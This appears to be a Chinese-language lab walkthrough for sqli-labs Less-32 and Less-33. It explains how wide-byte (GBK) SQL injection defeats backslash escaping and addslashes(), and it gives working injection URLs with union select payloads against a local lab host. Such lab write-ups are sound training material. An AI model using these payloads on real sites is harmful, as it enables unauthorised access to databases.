LESS 32 33

\less  32

 

LESS 32 33_第1张图片

例子:   id= 1’       处理  1  \  ’       进行编码   1   %5c    %27         带入sql后  and XXXX  此时无法完成注入
              id=1%df’  处理 1  %df   \  ’ 进行编码  1  %df   %5c   %27   带入sql后  id =1運’ and XXX 此时存在宽字节注入漏洞

 

推荐解码网站: http://www.mytju.com/classcode/tools/urldecode_gb2312.asp

 

LESS 32 33_第2张图片    \’  并不影响sql语句的执行LESS 32 33_第3张图片

此时返回的是经过转义之后的数据,我们通过返回的数据可以看到,单引号已经被转义了

 

LESS 32 33_第4张图片

 

 

 LESS 32 33_第5张图片

 

 http://192.168.50.100/sqli-labs/Less-32/?id=1%df'

我们可以使用%df’  或者是  %df %27

LESS 32 33_第6张图片

LESS 32 33_第7张图片

 

 

 

 

 http://192.168.50.100/sqli-labs/Less-32/?id=1%df'--+

 

 

    

LESS 32 33_第8张图片

http://192.168.50.100/sqli-labs/Less-32/?id=1%df'  union  select 1,2,3--+

LESS 32 33_第9张图片

http://192.168.50.100/sqli-labs/Less-32/?id=a1%df'  union  select 1,2,3--+

LESS 32 33_第10张图片

 

 

 

 less32

法二:

LESS 32 33_第11张图片

 

 


%5c代表的是 \
此时构造: %5c %5c %5c %5c’
只要是我们能将返回的结果中对于单引号没有转义字符进行处理即可。
示例方法: http://192.168.50.100//Less-32/?id=-1%aa%5c' union select 1,2,3 --+
其余操作基本相似。

 

 

LESS 32 33_第12张图片

 

 

 

 

 less33


通过源码可得知: 在32关中使用的是自定义的过滤,本关中使用的是php中的 addslashes()函数
其作用:addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。
(参考链接:https://www.w3school.com.cn/php/func_string_addslashes.asp)
法1: 直接使用宽字节的方法
http://192.168.50.100/sqli-labs/Less-33/?id=1%df’--+

LESS 32 33_第13张图片

 

 

 


法二:自定义闭合
http://192.168.50.100/sqli-labs/Less-33/?id=-1%aa%5c%27 union select 1,2,3--+
其实和less32关基本相同。

LESS 32 33_第14张图片

 

 

 

 

 

 

你可能感兴趣的:(LESS 32 33)